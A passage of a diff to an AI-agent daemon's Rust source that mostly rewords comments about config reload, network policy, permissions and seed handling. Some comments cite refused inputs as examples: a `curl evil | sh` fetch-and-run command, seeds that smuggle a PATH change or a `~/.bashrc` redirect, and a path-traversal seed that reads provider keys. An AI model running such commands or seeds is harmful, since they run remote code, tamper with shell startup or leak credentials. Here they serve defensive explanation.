@@ -59,9 +59,9 @@ impl Drop for HostPermit {
         let mut counts = IN_FLIGHT
             .lock()
             .unwrap_or_else(std::sync::PoisonError::into_inner);
-        // `or_insert(1)` rather than `if let Some(..)`: acquire always inserted
+        // `or_insert(1)` rather than `if let Some(..)`: acquire always inserts
         // the key and this is its only remover, so the missing case cannot
-        // happen - and written as a branch it was a region no test could enter.
+        // happen - and written as a branch it is a region no test can enter.
         let remaining = counts.entry(host.clone()).or_insert(1);
         *remaining = remaining.saturating_sub(1);
         if *remaining == 0 {
@@ -134,7 +134,7 @@ pub(super) static ALLOW_LOCAL_REDIRECTS: std::sync::atomic::AtomicBool =
 /// It lives next to the atomic rather than inside one module's test block
 /// because the writers are not all in one module: `setup_daemon_host_with`
 /// mirrors the config into it at daemon start-up, so a test that stands up a
-/// host is a writer too - and that was the one with no idea it had to take this.
+/// host is a writer too, and is the one least likely to look like one.
 /// An async mutex rather than a `std` one because the writers await: standing up
 /// a daemon host is an `async fn`, so a `std` guard held across it is
 /// `clippy::await_holding_lock` - and the lint is right, the guard would be
@@ -168,10 +168,10 @@ pub(super) fn local_network_allowed() -> bool {
 ///
 /// Called at daemon start-up and again on every `config.toml` reload. The
 /// reload half is the security-relevant one. The per-agent check for
-/// `[security] allow_local_network` reads the reloaded config already, so a
-/// user who *tightened* the switch had the URL a script names refused while a
-/// redirect from a permitted URL to loopback was still followed - for as long
-/// as the daemon lived. Policy has to be able to travel down, not only up.
+/// `[security] allow_local_network` reads the reloaded config already, so
+/// without this a user who *tightened* the switch gets the URL a script names
+/// refused while a redirect from a permitted URL to loopback is still followed,
+/// for as long as the daemon lives. Policy has to travel down, not only up.
 pub(crate) fn mirror_process_policy(config: &crate::config::Config) {
     set_local_network_allowed(config.security.allow_local_network);
     set_script_http_max_per_host(config.limits.script_http_max_per_host);

--- a/crates/leviath-cli/src/daemon/script_host/permissions.rs
+++ b/crates/leviath-cli/src/daemon/script_host/permissions.rs
@@ -73,7 +73,7 @@ fn script_restrictiveness(p: ScriptPermission) -> u8 {
 /// Agents ship their own `.rhai` tool scripts, so it is reasonable for a
 /// manifest to say "this agent never needs `shell`". It is not reasonable for it
 /// to say the opposite: a manifest that could set `shell = "allow"` over a user's
-/// global `deny` meant installing an agent was enough to overrule the machine's
+/// global `deny` would make installing an agent enough to overrule the machine's
 /// configuration. So a manifest may tighten a field and never loosen it, the same
 /// rule [`crate::tools::resolve_policy`] applies to `[tool_permissions]`.
 ///
@@ -87,8 +87,7 @@ pub(crate) fn effective_script_permissions(
     // `toml::from_str`, not `manifest_toml.parse::<toml::Value>()`. In toml 1.x
     // `FromStr for Value` parses a single *value*, not a document - so a real
     // manifest starting with `[agent]` reads as an array literal followed by
-    // junk and fails. It still compiles, so the change is silent; the tests are
-    // what caught it.
+    // junk and fails. Both spellings compile, so swapping them is silent.
     let Ok(value) = toml::from_str::<toml::Value>(manifest_toml) else {
         return eff;
     };

--- a/crates/leviath-cli/src/daemon/seed_command.rs
+++ b/crates/leviath-cli/src/daemon/seed_command.rs
@@ -97,8 +97,8 @@ impl SeedCommandPolicy {
     /// all of them. So the question "may this command run unattended" is
     /// answered by the machinery that already answers it for the `shell` tool:
     /// the safe list. `git ls-files` is on it by default, so the bundled agents
-    /// are unaffected; `curl evil | sh` is not, and a manifest the user
-    /// downloaded no longer gets to run it at spawn.
+    /// are unaffected; `curl evil | sh` is not, so a manifest the user
+    /// downloaded does not get to run it at spawn.
     ///
     /// This inherits the shell key grammar's hardening for free - a seed of
     /// `PATH=/tmp/x git ls-files` or `git ls-files > ~/.bashrc` is refused by

--- a/crates/leviath-cli/src/daemon/seed_tool.rs
+++ b/crates/leviath-cli/src/daemon/seed_tool.rs
@@ -161,16 +161,15 @@ pub(crate) struct SeedToolContext {
 pub(crate) type SeedPolicyResolver = Arc<dyn Fn(&str, bool) -> ToolPolicy + Send + Sync>;
 
 /// Build the runner a real spawn uses.
-///
 pub(crate) fn production_runner(
     ctx: SeedToolContext,
     resolve: SeedPolicyResolver,
 ) -> SeedToolRunner {
     Arc::new(move |name: &str, args: &serde_json::Value| {
         let is_builtin = ctx.builtin_names.contains(name);
-        // The same three fences the tool lane applies to a mid-run call, in
-        // the same order: a seed used to skip all of them, and a seed is the
-        // one call that runs before anyone could have been asked.
+        // The same three fences the tool lane applies to a mid-run call, in the
+        // same order. A seed needs them most: it is the one call that runs
+        // before anyone could have been asked.
         let policy = resolve(name, is_builtin);
         let policy =
             crate::tools::clamp_by_effect(name, args, policy, &|| resolve("write_file", true));
@@ -476,9 +475,9 @@ mod tests {
         assert!(err.contains("nobody to prompt"), "{err}");
     }
 
-    /// A seed runs before the first inference, so it used to run before every
-    /// fence the tool lane applies: a `shell` seed could redirect outside the
-    /// workdir, which the same line as a tool call is refused for.
+    /// A seed runs before the first inference, but not before the tool lane's
+    /// fences: a `shell` seed redirecting outside the workdir is refused, the
+    /// same as the identical line issued as a tool call.
     #[test]
     fn a_seed_cannot_redirect_outside_the_workdir() {
         let dir = tempfile::tempdir().unwrap();

--- a/crates/leviath-cli/src/daemon/setup.rs
+++ b/crates/leviath-cli/src/daemon/setup.rs
@@ -143,13 +143,13 @@ pub(crate) async fn setup_daemon_host_with(
     // Built before the registry, and shared with it: a script provider's
     // `[model_providers.<name>]` table is read through this, so editing it
     // takes effect on the next load exactly as editing the `.rhai` beside it
-    // already did (issue #533).
+    // does.
     //
-    // The same mirror is re-applied on every reload. Without that, the three
-    // atomics were the config the daemon *booted* with for the rest of its
-    // life, while the per-agent `allow_local_network` check next to them read
-    // the reloaded file - so tightening the switch refused the URL a script
-    // named and went on following a redirect to loopback.
+    // The same mirror is re-applied on every reload, because those three
+    // atomics have no other way to follow the file. The per-agent
+    // `allow_local_network` check beside them reads the reloaded config, so
+    // atomics left at their boot values would refuse the URL a script names
+    // while still following a redirect to loopback.
     let reloader = Arc::new(
         crate::daemon::config_reload::ConfigReloader::new(Config::config_path(), config.clone())
             .with_reload_hook(Box::new(crate::daemon::script_host::mirror_process_policy)),
@@ -162,24 +162,22 @@ pub(crate) async fn setup_daemon_host_with(
     // Ask each provider what its models are before anything runs on one.
     // `capabilities()` is synchronous and sits on the inference path, so a
     // provider whose real answer needs a network call has to be told here or
-    // never - and "never" meant an OpenRouter model this build's table does not
-    // name silently got a 128 000-token window, with every percentage region
-    // budget sized against it (#360). Awaited rather than spawned so the first
-    // run has the answer instead of racing it; failures are warnings.
+    // never - and "never" means an OpenRouter model this build's table does not
+    // name silently gets a 128 000-token window, with every percentage region
+    // budget sized against it. Awaited rather than spawned so the first run has
+    // the answer instead of racing it; failures are warnings.
     providers
         .prime_capabilities(
             std::time::Duration::from_secs(PROVIDER_PRIME_TIMEOUT_SECS),
             // The machine's default, so a script provider named there can
-            // answer what it serves and win an open route (issue #598). No
-            // effect when the default is a native provider, which is already
-            // in the list.
+            // answer what it serves and win an open route. No effect when the
+            // default is a native provider, which is already in the list.
             &[config.default_provider.as_str()],
         )
         .await;
     // Keeps that registry in step with `config.toml` from here on: a run
     // started after a `lev setup`, a `PUT /api/config` or a hand edit resolves
-    // against the providers the file names now, without a daemon restart
-    // (issue #684).
+    // against the providers the file names now, without a daemon restart.
     let provider_reload = crate::daemon::provider_reload::for_daemon(&config, providers.clone());
     // MCP connections are shared across agents; the workdir here only seeds the
     // (discarded) built-ins - each agent gets its own over its own workdir.
@@ -276,8 +274,8 @@ fn make_resumer(
 ///
 /// A struct rather than eight positional parameters because these are not
 /// arguments in the usual sense: each is a resource the host owns for the rest
-/// of the process's life, assembled once at boot and never varied. Naming them
-/// here describes the daemon; listing them at the call site described nothing.
+/// of the process's life. Naming them here describes the daemon; listing them
+/// at the call site describes nothing.
 pub struct HostParts {
     /// The resolved configuration this daemon booted with.
     pub config: Config,
@@ -298,8 +296,8 @@ pub struct HostParts {
     /// The clock, injected so a test does not depend on the wall clock.
     pub now_secs: fn() -> i64,
     /// The daemon's config source. Built before the provider registry so the
-    /// script-provider layer can follow it too (issue #533); `None` builds a
-    /// fixed one from `config`, for a caller with nothing to watch.
+    /// script-provider layer can follow it too; `None` builds a fixed one from
+    /// `config`, for a caller with nothing to watch.
     pub reloader: Option<Arc<crate::daemon::config_reload::ConfigReloader>>,
     /// Keeps the provider registry in step with `config.toml`. `None` builds
     /// one over `config` and `providers`, which is the same thing for a caller
@@ -310,7 +308,7 @@ pub struct HostParts {
 /// Build the daemon's [`WorldHost`]: one world hosting every agent, its tool
 /// service + interaction hub, and a `Spawn`-op spawner that loads blueprints
 /// and registers per-agent tool state. The MCP connections in [`HostParts`]
-/// are built once at startup and reused by every agent.
+/// are shared: every agent dispatches through the one pool.
 pub fn build_host(parts: HostParts) -> WorldHost {
     let hub = InteractionHub::new();
     let tool_service = Arc::new(CliToolService::new());
@@ -342,10 +340,8 @@ pub fn build_host(parts: HostParts) -> WorldHost {
     // stall and wedge watchdogs, the circuit breaker, the retry schedule, the
     // fan-out ceiling, the relief threshold, the spend figures, the listing
     // window, the prompt timeout and `[title]` - is installed from one place,
-    // and reinstalled from the same place whenever `config.toml` changes. Each
-    // of these used to be read exactly here and then fixed for the life of the
-    // process, so an edit to any of them did nothing until the daemon was
-    // restarted, with nothing to say so (issue #684).
+    // and reinstalled from the same place whenever `config.toml` changes, so an
+    // edit to any of them lands without a daemon restart.
     let live_limits = crate::daemon::live_limits::for_daemon(hub.clone(), host.settings());
     live_limits.apply(&parts.config, host.world_mut());
     // Handed to each agent's tool state so its sub-agent tools reach the world
@@ -375,15 +371,14 @@ pub fn build_host(parts: HostParts) -> WorldHost {
 
     // Config hot-reload: after boot, spawn-time parts.config (permissions,
     // `[read_paths]`, sandbox, limits, taint) is served from here, reloaded
-    // when `parts.config.toml` changes on disk. The boot infrastructure that
-    // holds live connections - the MCP pool, the network policy - keeps the
-    // boot snapshot and needs a restart, so the reloader takes a clone and the
-    // boot snapshot stays usable below. The telemetry sink follows the
-    // reloaded config too, through `telemetry_reload` below.
+    // when `config.toml` changes on disk. The reloader takes a clone, so
+    // `parts.config` stays usable below as the boot snapshot the rest of this
+    // wiring reads. The telemetry sink follows the reloaded config too, through
+    // `telemetry_reload` below.
     //
     // Normally handed in: `setup_daemon_host_with` builds it before the
-    // provider registry so the script-provider layer can follow it as well
-    // (issue #533). A caller that did not gets a fixed one over its own config.
+    // provider registry so the script-provider layer can follow it as well. A
+    // caller that did not gets a fixed one over its own config.
     let reloader = parts.reloader.clone().unwrap_or_else(|| {
         std::sync::Arc::new(crate::daemon::config_reload::ConfigReloader::new(
             Config::config_path(),
@@ -477,7 +472,7 @@ pub fn build_host(parts: HostParts) -> WorldHost {
         // A run parked on a provider that has since been replaced re-resolves
         // its stages here, so the new set has to be in the world first: this
         // is what lets `lev resume` move a credits-paused run onto the
-        // provider the config names now (issue #684).
+        // provider the config names now.
         reload_provider_reload.refresh(&reload_config);
         reload_provider_reload.install(world);
         // A run paged back in is rebuilt from scratch, so it gets the policy
@@ -486,7 +481,7 @@ pub fn build_host(parts: HostParts) -> WorldHost {
         reload_telemetry.refresh_into(world, &reload_config.observability);
         // Including its limits: a run being paged back in is as much a fresh
         // start as a spawn, and it must not resume against the numbers the
-        // daemon booted with (issue #684).
+        // daemon booted with.
         reload_limits.apply(&reload_config, world);
         // The global MCP set as it stands now, not as it stood at boot: a run
         // paged back in is rebuilt with the tools a fresh spawn would get.
@@ -513,8 +508,8 @@ pub fn build_host(parts: HostParts) -> WorldHost {
     // Last resort for a cancel the world can't service: force the run's on-disk
     // state to `Cancelled`. The reloader above declines whenever a run can't be
     // rebuilt - deleted blueprint, unreadable metadata, died mid-spawn - and
-    // without this a cancel in that state wrote nothing at all, so `meta.json`
-    // went on claiming the run was live and nothing could ever clear it.
+    // without this a cancel in that state writes nothing at all, leaving
+    // `meta.json` claiming the run is live with nothing able to clear it.
     let terminate_runs = parts.runs_dir.clone();
     host.set_force_terminator(Box::new(move |run_id| {
         crate::runstate::force_cancel_in(&terminate_runs.join(run_id), (parts.now_secs)())
@@ -522,23 +517,22 @@ pub fn build_host(parts: HostParts) -> WorldHost {
     }));
 
     // Reap hook: when a terminal agent is reaped, tear down its sandbox and drop
-    // its per-agent tool state (the latter also fixing a prior leak where tool
-    // state was never released). Factored into `make_reaper` so the closure body
-    // is unit-testable - the daemon only ever drives it from `serve()`.
+    // its per-agent tool state, which nothing else releases. Factored into
+    // `make_reaper` so the closure body is unit-testable - the daemon only ever
+    // drives it from `serve()`.
     host.set_reaper(make_reaper(tool_service.clone(), parts.mcp_pool.clone()));
 
     // Resume hook: a run that starts moving again re-reads the config layers a
-    // person edits to unblock it. A run parked on a denied tool used to have
-    // no way out but a cancel, because its permissions were resolved once at
-    // spawn - and with an unanswered prompt waiting for ever by default, that
-    // stall is permanent.
+    // person edits to unblock it. Without it a run parked on a denied tool has
+    // no way out but a cancel, since its permissions were resolved at spawn and
+    // an unanswered prompt waits for ever by default.
     host.set_resumer(make_resumer(tool_service.clone(), reloader.clone()));
 
     // Preprocessor: before the sync spawner runs, connect the blueprint's declared
     // MCP servers into the shared pool (lazy, deduped) so they're warm to advertise -
     // and pre-warm the servers declared by any `worker_agent`/`worker_query`
     // fan-out worker this blueprint will spawn, so the *first* such worker already
-    // advertises them (they'd otherwise land one turn late - issue #97).
+    // advertises them (they'd otherwise land one turn late).
     let pp_pool = parts.mcp_pool.clone();
     let pp_agents_dir = leviath_core::paths::agents_dir();
     // The models too, and for a reason the MCP warming does not have: a stage's
@@ -559,14 +553,14 @@ pub fn build_host(parts: HostParts) -> WorldHost {
         Box::pin(async move {
             // Before the blueprint's own servers, and before the sync spawner
             // reads the set: connecting is async, and this is the only hook on
-            // the spawn path that can await (issue #684's MCP half).
+            // the spawn path that can await.
             global.refresh(&config).await;
             warm_blueprint_mcp(&pool, &blueprint_path).await;
             warm_fanout_worker_mcp(&pool, &blueprint_path, agents_dir.as_deref()).await;
             // Before the models are warmed, not after: a provider the user
             // configured since this daemon started has to exist before anyone
             // asks it what its models are. The sync spawner installs whatever
-            // this built (issue #684).
+            // this built.
             reload.refresh_and_prime(&config).await;
             warm_blueprint_models(
                 &reload.registry(),
@@ -591,8 +585,8 @@ pub fn build_host(parts: HostParts) -> WorldHost {
     host.set_spawner(Box::new(move |world, args| {
         // Stake out the run directory before anything that can fail: blueprint
         // parsing, sandbox creation, provider resolution and seed validation all
-        // come later, and until now a failure at any of them left no trace on
-        // disk at all - no run dir, no meta.json, nothing to diagnose (#107).
+        // come later, and a failure at any of them would otherwise leave no
+        // trace on disk - no run dir, no meta.json, nothing to diagnose.
         // The reload path deliberately doesn't do this: it must not overwrite a
         // recovering run's own metadata.
         write_placeholder_meta(&spawn_runs_dir, args);
@@ -615,7 +609,7 @@ pub fn build_host(parts: HostParts) -> WorldHost {
         // The registry, before the stages resolve against it. The preprocessor
         // has usually built it already; refreshing here too covers the paths
         // that do not run one (a sub-agent spawn, a fan-out worker) and costs
-        // a credential comparison when nothing changed (issue #684).
+        // a credential comparison when nothing changed.
         spawn_provider_reload.refresh(&config);
         spawn_provider_reload.install(world);
         // Same for the taint gate: `lev policy add` and an edited `.rhai` rule
@@ -627,7 +621,7 @@ pub fn build_host(parts: HostParts) -> WorldHost {
         // Before the agent is built, not after: `build_agent` decides from this
         // same config whether the run is marked for a title, and the system
         // that makes titles reads the world. Applying here is what stops those
-        // two reading different documents (issue #684).
+        // two reading different documents.
         spawn_limits.apply(&config, world);
         let built = build_agent(
             world.world_mut(),
@@ -643,10 +637,10 @@ pub fn build_host(parts: HostParts) -> WorldHost {
             },
             args,
         );
-        // The placeholder above is `Starting`, which is *not* terminal - so a
-        // failed spawn used to leave a run that claimed to be alive for ever,
-        // listed by `lev ps` and the dashboard with nothing behind it. Record
-        // the failure where the placeholder is (issue #190).
+        // The placeholder above is `Starting`, which is *not* terminal, so a
+        // failed spawn would leave a run claiming to be alive for ever, listed
+        // by `lev ps` and the dashboard with nothing behind it. Record the
+        // failure where the placeholder is.
         if let Err(message) = &built {
             crate::runstate::force_error_in(
                 &spawn_runs_dir.join(&args.run_id),
@@ -1004,7 +998,7 @@ mod tests {
         // Config::default has no MCP servers → the shared MCP connect is a no-op.
         // An empty runs dir → restart recovery finds nothing to reload.
         // A key for the manifest's provider, because a spawn whose stages have
-        // no usable provider is now refused outright (issue #190).
+        // no usable provider is refused outright.
         let runs = tempfile::tempdir().unwrap();
         let mut host = setup_daemon_host(
             config_with_anthropic_key(),
@@ -1279,7 +1273,7 @@ mod tests {
         assert!(run_ids_in(&dir.path().join("nope")).is_empty());
     }
 
-    // ── per-agent MCP (issue #97) ──
+    // ── per-agent MCP ──
 
     /// A python stub MCP server written to a temp file; returns (tempdir, path).
     fn stub_server_py() -> (tempfile::TempDir, std::path::PathBuf) {
@@ -1847,12 +1841,10 @@ task = {{ kind = "pinned", max_tokens = 200, seed = {{ caller = "task" }} }}
         (op, reply_rx)
     }
 
-    /// The bug this whole file's provider reload exists for: the daemon boots
-    /// with one provider configured, the user configures another (`lev setup`,
-    /// `PUT /api/config`, an editor - they all write this file), and the very
-    /// next run has to be able to use it. Before the registry was rebuilt, the
-    /// second spawn was refused with "no usable provider" until the daemon was
-    /// killed and restarted (issue #684).
+    /// What the provider reload exists for: the daemon boots with one provider
+    /// configured, the user configures another (`lev setup`, `PUT /api/config`,
+    /// an editor - they all write this file), and the very next run has to be
+    /// able to use it rather than be refused with "no usable provider".
     #[tokio::test]
     async fn a_provider_configured_after_boot_is_usable_on_the_next_spawn() {
         let dir = tempfile::tempdir().unwrap();
@@ -2323,8 +2315,6 @@ task = {{ kind = "pinned", max_tokens = 200, seed = {{ caller = "task" }} }}
     /// A `[limits]` edit is picked up by the next spawn, with no daemon
     /// restart: the pools, the tool lane, the watchdogs, the breaker, the retry
     /// schedule and the fan-out ceiling all move to what the file says now.
-    /// Every one of these was read once at boot and then fixed for the life of
-    /// the process (issue #684).
     #[tokio::test]
     async fn a_limits_edit_reaches_the_world_on_the_next_spawn() {
         let dir = tempfile::tempdir().unwrap();
@@ -2398,11 +2388,10 @@ task = {{ kind = "pinned", max_tokens = 200, seed = {{ caller = "task" }} }}
         assert_eq!(*settings.spend_notify_usd(), vec![5.0]);
     }
 
-    /// Turning `[title]` on used to leave a run marked for a title nobody would
-    /// ever make. Spawn reads a fresh config, so it marked the run
-    /// `PendingTitle`; the system that makes titles read the boot-time
-    /// `TitleSettings`, saw titling switched off, and dropped the marker
-    /// without a word. Both halves now read the same document (issue #684).
+    /// Turning `[title]` on has to reach both halves at once. Spawn reads a
+    /// fresh config and marks the run `PendingTitle`; if the system that makes
+    /// titles were still on a boot-time `TitleSettings` it would see titling
+    /// switched off and drop the marker without a word.
     #[tokio::test]
     async fn enabling_titles_reaches_the_system_that_makes_them() {
         let dir = tempfile::tempdir().unwrap();

--- a/crates/leviath-cli/src/daemon/spawn/mod.rs
+++ b/crates/leviath-cli/src/daemon/spawn/mod.rs
@@ -6,9 +6,10 @@
 //! world's registered providers) and effective tool set, spawns the agent via
 //! [`leviath_runtime::pipeline::spawn_agent`], attaches its run metadata /
 //! token totals / compaction settings, and registers its per-agent tool state
-//! with the [`CliToolService`]. The heavy MCP connections are shared (built once
-//! at daemon startup), so this whole path is synchronous - which lets it run
-//! straight from the host's control loop.
+//! with the [`CliToolService`]. The heavy MCP connections are shared, and the
+//! async spawn preprocessor has already warmed the ones this run needs, so this
+//! whole path is synchronous - which lets it run straight from the host's
+//! control loop.
 
 use std::collections::{HashMap, HashSet};
 use std::path::Path;
@@ -134,7 +135,7 @@ fn check_spawn_request(args: &SpawnArgs) -> Result<(), String> {
     // The working directory must exist before anything is built over it.
     // `ToolContext::new` silently keeps a path it can't canonicalize, so without
     // this a bogus workdir spawns a healthy-looking agent whose every tool call
-    // fails with a message naming the shell rather than the directory (#107).
+    // fails with a message naming the shell rather than the directory.
     if !std::fs::metadata(&args.workdir).is_ok_and(|m| m.is_dir()) {
         return Err(format!(
             "workspace '{}' does not exist or is not a directory",
@@ -525,7 +526,7 @@ fn build_agent_inner(
     // fresh script scan on each mid-run refresh.
     let static_tool_defs = all_tool_defs.clone();
 
-    // 2c. Rhai script tools (issue #97): discover and compile the agent's
+    // 2c. Rhai script tools: discover and compile the agent's
     // `tools/` dir plus the global `~/.leviath/tools/` (per-agent wins on a name
     // collision). Their defs are added to `all_tool_defs` *before* stage
     // resolution so a stage's `available_tools` (Layer 1) and taint
@@ -693,9 +694,9 @@ fn build_agent_inner(
             )
         },
     );
-    // One write budget per run, created here so the seeds and the scripts
-    // that run at spawn spend the same ceiling the tool lane checks from
-    // turn one; it used to be born with the tool state, after both.
+    // One write budget per run, created before the seeds and the spawn-time
+    // scripts so they spend the same ceiling the tool lane checks from turn
+    // one. Building it with the tool state would put it after both.
     let writes = Arc::new(crate::daemon::tool_service::WriteBudget::new(
         deps.config.limits.write_limits(),
     ));
@@ -727,7 +728,7 @@ fn build_agent_inner(
     // regions that weren't provided fail here - before any inference, so no
     // tokens are spent. On reload the window is restored from a snapshot after
     // this, so seeding is skipped entirely.
-    // Command seeds (issue #108) run here, so they inherit the entry stage's
+    // Command seeds run here, so they inherit the entry stage's
     // sandbox (built in step 2a above) and are refused by either the machine-wide
     // `[security] allow_seed_commands` switch or this run's `--no-seed-commands`.
     let seeds = if enforce_seeds {
@@ -788,8 +789,8 @@ fn build_agent_inner(
         HashMap::new()
     };
 
-    // 5b. Read + compile-check custom regions' Rhai scripts (issue #152) -
-    // once per distinct path, blueprint-dir-relative. Runs on fresh spawns
+    // 5b. Read + compile-check custom regions' Rhai scripts - once per
+    // distinct path, blueprint-dir-relative. Runs on fresh spawns
     // AND reloads (the hooks must work after a restart), and a broken script
     // is a hard error either way.
     let region_scripts = resolve_region_scripts(&blueprint, &args.blueprint_path)?;
@@ -799,7 +800,7 @@ fn build_agent_inner(
     // Whether any stage can produce a file change the framework would see -
     // asked here, while the blueprint is still in hand, because it cannot
     // change for the rest of the run. A run that could never write is never
-    // reported as having written nothing (issue #192).
+    // reported as having written nothing.
     let outcome_flags = leviath_runtime::persistence::RunOutcomeFlags::for_blueprint(&blueprint);
     // Taken here for the same reason: the tool state is built after the
     // blueprint has been handed to the world, and this list cannot change.
@@ -888,8 +889,8 @@ fn build_agent_inner(
         unattended: args.yolo,
         model_override: args.model.clone(),
     };
-    // Build the dynamic-tools re-resolution context (issue #97 escape hatch) and
-    // tag the entity `DynamicTools` so the runtime polls it for mid-run re-scans.
+    // Build the dynamic-tools re-resolution context and tag the entity
+    // `DynamicTools` so the runtime polls it for mid-run re-scans.
     let dynamic = dynamic_tools.then(|| {
         world
             .entity_mut(entity)
@@ -1364,7 +1365,7 @@ system = { kind = "pinned", max_tokens = 1000 }
         assert!(err.contains("failed to compile"), "{err}");
     }
 
-    // ─── resolve_stage_hook_scripts (issue #260) ─────────────────────────
+    // ─── resolve_stage_hook_scripts ──────────────────────────────────────
 
     fn hooked_manifest(hooks: &str) -> leviath_core::Blueprint {
         leviath_core::manifest::parse_manifest(&format!(
@@ -1612,7 +1613,7 @@ system = { kind = "pinned", max_tokens = 1000 }
     async fn build_agent_rejects_a_workdir_that_is_missing_or_not_a_directory() {
         // `ToolContext::new` silently keeps a path it can't canonicalize, so
         // without this check a bogus workdir spawns a healthy-looking agent
-        // whose every tool call then fails with ENOENT (issue #107).
+        // whose every tool call then fails with ENOENT.
         let dir = tempfile::tempdir().unwrap();
         let manifest = dir.path().join("agent.leviath");
         std::fs::write(
@@ -2108,7 +2109,7 @@ system = { kind = "pinned", max_tokens = 1000 }
                 .is_some()
         );
         // ...and likewise for the blueprint's own stage-boundary checkpoints and
-        // the agent's `ask_user_*` tools (#107): unattended means unattended.
+        // the agent's `ask_user_*` tools: unattended means unattended.
         assert!(
             world
                 .world()
@@ -2172,7 +2173,7 @@ system = { kind = "pinned", max_tokens = 1000 }
     /// A stage that kept a human tool through an unattended run has to reach the
     /// tool state with that tool in hand: the cut takes it out of the advertised
     /// set, and this set is what puts a call to it back in front of a person
-    /// instead of the auto-answering backend (issue #204).
+    /// instead of the auto-answering backend.
     /// A validator that will not compile stops the spawn, before any tokens are
     /// spent. The only other time the script is read is at the end of the run,
     /// which is the worst possible moment to learn the agent cannot hand back
@@ -2381,8 +2382,8 @@ system = { kind = "pinned", max_tokens = 1000 }
 
     #[tokio::test]
     async fn build_agent_no_security_block_leaves_taint_off_by_default() {
-        // Bug regression: a blueprint with no `[security]` block and a default
-        // (taint-off) global config must NOT attach the taint gate - an
+        // A blueprint with no `[security]` block and a default (taint-off)
+        // global config must NOT attach the taint gate - an
         // `unwrap_or_default()` on the resolved security forces it on for
         // every agent.
         let dir = tempfile::tempdir().unwrap();
@@ -2459,7 +2460,7 @@ system = { kind = "pinned", max_tokens = 1000 }
         assert!(!spawned_no_output_tools(&coder_manifest()).await);
         // A router-shaped agent delegates and never writes. Reporting it as
         // having "modified nothing" is an accusation the framework has no
-        // grounds for (issue #192).
+        // grounds for.
         assert!(
             spawned_no_output_tools(
                 "[agent]\nname = \"router\"\nversion = \"0.1.0\"\ndescription = \"d\"\n\n\
@@ -3083,9 +3084,9 @@ system_prompt = "SYSTEM_PROMPT_PLACEHOLDER"
 
     #[tokio::test]
     async fn build_agent_refuses_a_manifest_with_no_usable_provider() {
-        // The end-to-end shape of issue #190: this used to build an agent
-        // pointed at a provider nothing answers to, which then sat at
-        // iteration 0 for the life of the daemon.
+        // End to end: without this an agent is built pointed at a provider
+        // nothing answers to, and then sits at iteration 0 for the life of the
+        // daemon.
         let dir = tempfile::tempdir().unwrap();
         let manifest = dir.path().join("ghostly.leviath");
         std::fs::write(
@@ -3637,8 +3638,8 @@ docs = { kind = "pinned", max_tokens = 2000, seed = { files = ["a.txt", "b.txt"]
         assert!(docs.contains("alpha") && docs.contains("beta"));
     }
 
-    /// A seed file is read into the prompt, so it is held to the same size a
-    /// script's I/O is: a multi-megabyte file used to arrive whole.
+    /// A seed file is read into the prompt, so it is held to the same size cap
+    /// a script's I/O is: uncapped, a multi-megabyte file arrives whole.
     #[test]
     fn resolve_seeds_caps_an_oversized_file() {
         let dir = tempfile::tempdir().unwrap();
@@ -3824,7 +3825,7 @@ docs = { kind = "pinned", max_tokens = 2000, seed = { files = ["a.txt", "b.txt"]
         assert!(err.contains("rhai seed failed"), "got: {err}");
     }
 
-    // ─── command seeds (issue #108) ──────────────────────────────────────────
+    // ─── command seeds ───────────────────────────────────────────────────────
 
     // ── tool seeds ────────────────────────────────────────────────────────
 

--- a/crates/leviath-cli/src/daemon/spawn/scripts.rs
+++ b/crates/leviath-cli/src/daemon/spawn/scripts.rs
@@ -110,7 +110,7 @@ pub(crate) fn resolve_output_validators(
 }
 
 /// Compile every stage-hook script the blueprint declares, keyed by the path as
-/// written (issue #260).
+/// written.
 ///
 /// Fail-fast at spawn, exactly as region scripts are: an unreadable file, one
 /// that does not compile, or one the blueprint names for a hook it does not

--- a/crates/leviath-cli/src/daemon/spawn/seeds.rs
+++ b/crates/leviath-cli/src/daemon/spawn/seeds.rs
@@ -16,8 +16,8 @@ use crate::daemon::seed_tool;
 /// otherwise write `seed = { files = ["../../.leviath/config.toml"] }` and have
 /// the provider keys in that file seeded straight into a pinned context region -
 /// from where they travel to the model, and out through the answer, a webhook,
-/// or a sub-agent. `read_file` has been confined for exactly this since the
-/// symlink-escape fix; seeding was the path that stayed open.
+/// or a sub-agent. `read_file` is confined for exactly this reason, and a seed
+/// reads on the same terms.
 ///
 /// Outside the workdir falls back to `[read_paths]`, which is already the
 /// mechanism for "this agent is meant to read there and the user agreed",

--- a/crates/leviath-cli/src/daemon/spawn/tool_state.rs
+++ b/crates/leviath-cli/src/daemon/spawn/tool_state.rs
@@ -17,7 +17,7 @@ use super::*;
 /// narrower than the lint: three of them - `run_id`, `entry_stage` and
 /// `agent_name` - are all `&str`. Transposing any two of those compiles
 /// silently and produces a run whose approvals are keyed to the wrong name.
-/// Nothing else in this file was ever going to catch that.
+/// Nothing else in this file would catch that.
 pub(super) struct ToolStateParts<'a> {
     /// The run's write budget, already spent on by the seeds.
     pub(super) writes: Arc<crate::daemon::tool_service::WriteBudget>,

--- a/crates/leviath-cli/src/daemon/subagent.rs
+++ b/crates/leviath-cli/src/daemon/subagent.rs
@@ -42,9 +42,9 @@ pub(crate) struct SubAgentHandle {
     ///
     /// The docs call the override absolute - it "overrides everything" - and a
     /// child named by the model at run time is part of the run, not a separate
-    /// one. Without this a spawned sub-agent quietly resolved against its own
-    /// blueprint's model list instead (issue #534). `None` when the run named
-    /// no model, which leaves every child resolving as it always has.
+    /// one. Without this a spawned sub-agent quietly resolves against its own
+    /// blueprint's model list instead. `None` when the run named no model,
+    /// which leaves every child resolving from its blueprint.
     pub model_override: Option<String>,
 }
 
@@ -214,10 +214,9 @@ async fn wait(h: &SubAgentHandle, agent_id: &str) -> String {
         return "[error] wait_for_agent requires 'agent_id'".to_string();
     }
     // The whole wait happens off the tool lane. The child's own tool batches
-    // queue on that lane, so a parent that kept lane capacity while waiting was
-    // holding the very thing the child needed to finish - a parent and child
-    // deadlocked on each other, which is what froze whole factories for hours
-    // (issue #191).
+    // queue on that lane, so a parent that kept lane capacity while waiting
+    // would hold the very thing the child needs to finish: parent and child
+    // deadlock on each other and the whole factory stops.
     leviath_runtime::tool_bridge::off_lane(poll_until_finished(h, agent_id)).await
 }
 
@@ -694,9 +693,9 @@ task = { kind = "pinned", max_tokens = 1000 }
         assert_eq!(seen[0].max_depth, Some(2));
     }
 
-    /// A child of an unattended parent is unattended. Spawning it attended left
-    /// it stopped at its first approval prompt with nobody there to answer, and
-    /// parked the parent behind it for good (issue #184).
+    /// A child of an unattended parent is unattended. Spawned attended it stops
